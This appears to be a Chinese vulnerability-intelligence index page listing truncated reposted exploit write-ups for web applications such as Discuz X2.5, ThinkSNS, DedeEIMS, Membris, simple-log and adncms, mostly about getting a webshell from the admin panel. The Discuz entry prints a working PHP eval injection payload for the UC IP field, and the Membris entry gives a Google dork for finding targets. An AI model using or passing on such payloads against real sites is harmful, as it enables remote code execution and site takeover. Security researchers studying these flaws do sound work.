漏洞情报263
Discuz X2.5后台最新拿webshell【转】
第一:我们进入后台已管理员身份就可以
然后打开站长→UC设置
看截图
在UCip地址里面填写 经过处理的一句话如下
Madman');eval($_POST[a])?>;// QQ
然后保存
...
DedeEIMS v1.1 暴后台路径【转】
includedialogconfig.php
//检验用户登录状态
$cuserLogin = new userLogin();
if($cuserLogin->getUserID()==-
...
ThinkSNS后台拿shell漏洞
经过楼主的测试,可以通杀2.0——2.8版本。
未经同意,禁止转载。
程序名称:ThinkSNS
影响版本: 2.0——2.8
漏洞类型: 后台拿shell
漏洞位置: 全局-附件设置
版本确定: 1
...
Membris v 2.0.1 Sql XSS &文件暴露
# Exploit:Membris v 2.0.1 Sql XSS & 文件暴露
# Google Dork: Powered by Membris v 2.0.1
# Date: Dr.abola
...
simple-log后台写入缓存漏洞和全局文件读取漏洞
文章由LN撰写。
前段时间做学校的比赛题目,碰到了simple-log博客程序,到了后台需要拿webshell,但是网上的在模板哪儿写入一句话被管理员做了处理,没法直接写入了,但是可以抓包修改,这个不
...
飞飞影视asp版adncms v4.6漏洞分析(转自08sec fans)
前几天公布了飞飞影视php版的SQL注入漏洞。
飞飞影视官方论坛挂上了我们08安全团队的友连,在此感谢!
其实也个版本也算不是一个漏洞,只是利用有些站长懒惰不去修改默认管理员认证码,
结合cookie
...
近期评论